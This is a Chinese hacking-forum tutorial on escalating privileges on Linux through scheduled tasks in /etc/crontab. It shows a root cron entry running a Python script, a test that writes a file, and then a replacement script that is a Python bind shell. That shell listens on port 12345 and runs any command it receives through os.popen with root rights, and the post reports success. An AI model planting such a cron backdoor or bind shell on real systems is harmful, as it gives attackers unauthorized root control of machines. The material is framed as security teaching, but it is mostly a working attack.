计划任务提权crontab提权-女黑客-必火安全学院

女黑客

 找回密码
 立即注册

QQ登录

只需一步,快速开始

计划任务提权crontab提权

[复制链接]
发表于 2023-1-16 01:12:57 | 显示全部楼层 |阅读模式
利用系统 会周期性的去执行特定的指令来提权
在kali下面输入命令:
  1. cat /etc/crontab
复制代码
171103hb2lxrwemlnb22dq.png

我们修改/etc/crontab 添加一行内容
165307ek88778m7bq8tkx8.png
nanhack.py 代码如下

  1. f_write = open('./nanhack.txt','w+')
  2. f_write.write('www.bihuo.cn')
  3. f_write.close()
复制代码


创建文件nanhack.txt,内容为www.bihuo.cn
等待一分钟,执行命令

  1. sudo find / -name "nanhack.txt"
复制代码

165632c33lmbtsixliniix.png

文件已经创建成功,因为是root权限执行,当前目录直接在root目录

提权方法:

我们替换nanhack.py 为其他内容
  1. import socket
  2. import os
  3. #AF_INET 代表ipv4 SOCK_STREAM==>tcp
  4. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  5. s.bind(('0.0.0.0', 12345))
  6. s.listen(5)

  7. while True:
  8.         conn, addr = s.accept()
  9.         for i in range(10):
  10.                 cmd = conn.recv(1024)
  11.                 print(cmd)
  12.                 command = cmd.decode(encoding='utf-8')
  13.                 if command.startswith("cd"):
  14.                         os.chdir(command[2:].strip())
  15.                         result = os.getcwd()
  16.                 else:
  17.                         result = os.popen(command).read()
  18.                 if result:
  19.                         conn.send(result.encode('utf-8'))
  20.                 else:
  21.                         conn.send(b'ok')
复制代码

这段代码的内容为:监听12345端口,并等待其他机器链接,并执行传递的命令。

截图202301190808403650.png

等待目标执行后,我们启动客户端 client.py
截图202301190810341180.png

执行后
截图202301190812292237.png
提权成功


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|小黑屋|女黑客 |网站地图

© Copyright 2021 版权所有(一极教育科技有限公司)

津ICP备17008032号-3
快速回复 返回顶部 返回列表